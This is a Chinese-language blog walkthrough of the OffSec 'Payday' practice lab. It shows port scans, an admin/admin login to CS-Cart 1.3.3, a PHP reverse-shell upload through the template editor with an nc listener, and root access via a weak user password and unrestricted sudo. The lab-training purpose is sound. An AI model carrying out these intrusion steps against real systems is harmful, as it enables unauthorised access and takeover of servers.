OSCP Payday Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Payday

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

CS-Cart 后台 RCE –> 系统 www-data 用户权限 –> 用户旗帜

权限提升:

Patrick 用户弱口令 –> sudo 权限 –> 系统 root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
7
8
9
10
11
sudo nmap -p- 192.168.185.39 --min-rate=2000

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
sudo nmap -p22,80,110,139,143,445,993,995 -sCV 192.168.185.39

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open pop3 Dovecot pop3d
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
|_pop3-capabilities: SASL RESP-CODES UIDL STLS CAPA TOP PIPELINING
|_ssl-date: 2025-09-22T02:51:33+00:00; +6s from scanner time.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imapd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2025-09-22T02:51:33+00:00; +6s from scanner time.
|_imap-capabilities: Capability completed NAMESPACE OK THREAD=REFERENCES CHILDREN MULTIAPPEND UNSELECT IMAP4rev1 IDLE SORT LOGINDISABLEDA0001 LOGIN-REFERRALS LITERAL+ SASL-IR STARTTLS
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_ssl-date: 2025-09-22T02:51:33+00:00; +7s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
995/tcp open ssl/pop3s?
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2025-09-22T02:51:33+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH、SMB、POP3 和 IMAP 服务。

3.2 渗透测试突破边界

3.2.1 CS-Cart 后台 RCE

访问靶机 HTTP 80 服务,通过弱口令 admin/admin 可登录系统后台。

通过目录枚举发现了 install 目录,访问该目录可得到应用版本信息:CS-Cart Version: 1.3.3。

在 exploit-db 网站检索应用漏洞,发现后台历史存在 RCE 漏洞。

参考链接:

1
2
https://www.exploit-db.com/exploits/48891
https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

复制 php reverse shell,保存为 shell.phtml。

1
https://www.revshells.com/

点击 外观-模版编辑器 ,将 shell.phtml 上传至靶机。

本地使用 nc 监听 80 端口,访问上传后的木马文件,得到系统 www-data 用户 shell。

1
2
http://192.168.185.39/skins/shell.phtml
nc -lvnp 80

升级为交互式 shell。

3.2.2 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Patrick 用户弱口令、sudo 权限滥用

使用弱口令 patrick/patrick 切换至 patrick 用户,patrick 用户可通过 sudo 以任意用户权限执行任意命令,利用该配置可提升至系统 root 权限。

1
2
3
su patrick
sudo -l
sudo su

拓展:

由于靶机 ssh 版本较老,使用的算法在本地已经默认禁用了,直接通过 ssh 连接会提示报错。

1
ssh patrick@192.168.185.39

在命令临时添加参数允许 rsa 算法或者直接在靶机使用 su 或 ssh。

1
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa patrick@192.168.185.39

OSCP 考题喜欢设计一些意想不到的弱口令,一定要警惕泄漏的可疑字符串,包括网站 title、靶机 host、用户名等。

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨


OSCP Payday Write-up
https://www.f0nesec.top/2025/09/22/oscp-payday/
作者
F0ne
发布于
2025年9月22日
许可协议